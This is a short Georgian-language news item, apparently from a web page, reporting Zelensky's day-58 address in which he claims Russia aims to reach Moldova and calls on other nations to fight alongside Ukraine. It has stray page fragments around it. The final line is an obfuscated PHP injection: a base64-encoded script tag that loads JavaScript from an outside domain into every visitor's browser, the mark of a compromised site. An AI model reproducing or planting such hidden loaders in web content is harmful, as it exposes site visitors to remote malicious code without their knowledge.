celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ რუსეთის უკრაინაში შეჭრის 58-ე დღის შემაჯამებელ ვიდეომიმართვაში განაცხადა, რომ ყველა ერს, ვისაც უკრაინასთან ერთად სიკვდილზე სიცოცხლით გამარჯვების სჯერა, მათთან ერთად უნდა იბრძოლოს.
 
,,დღეს, რუს სამხედროებზე მითითებით გავრცელდა ინფორმაცია, რომ მათი ამოცანა ახლა, თითქოს უკრაინის სამხრეთზე კონტროლის დამყარება და მოლდოვის საზღვართან მისვლაა და თითქოს იქ, მოლდოვაში, რუსულენოვანთა უფლებები ირღვევა, თუმცა მართალი გითხრათ, ტერიტორია, სადაც რუსეთმა რუსულენოვანი ადამიანების უფლებებზე უნდა იზრუნოს, თავად რუსეთია, სადაც არ არის სიტყვის თავისუფლება, სადაც ადამიანის სიცოცხლე უსარგებლოა. რუსეთის შეჭრა უკრაინაში მხოლოდ დასაწყისი იყო, მერე სხვა ქვეყნების ხელში ჩაგდება უნდათ. რა თქმა უნდა, ჩვენ საკუთარ თავს დავიცავთ მანამ, სანამ საჭირო იქნება რუსეთის ფედერაციის ამ ამბიციის დასამსხვრევად, მაგრამ ყველა ერმა, რომელსაც ჩვენ მსგავსად, სიცოცხლით სიკვდილზე გამარჯვების სჯერა, ჩვენთან ერთად უნდა იბრძოლოს. ისინი უნდა დაგვეხმარონ, რადგან ამ გზაზე პირველები ვართ და ვინ არის შემდეგი? თუ ვინმეს, ვინც შეიძლება შემდეგი გახდეს, სურს ნეიტრალური დარჩეს დღეს, რათა არაფერი დაკარგოს, ეს ყველაზე სარისკო ფსონია, იმიტომ რომ ყველაფერს დაკარგავენ", - განაცხადა ზელენსკიმ.
682
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");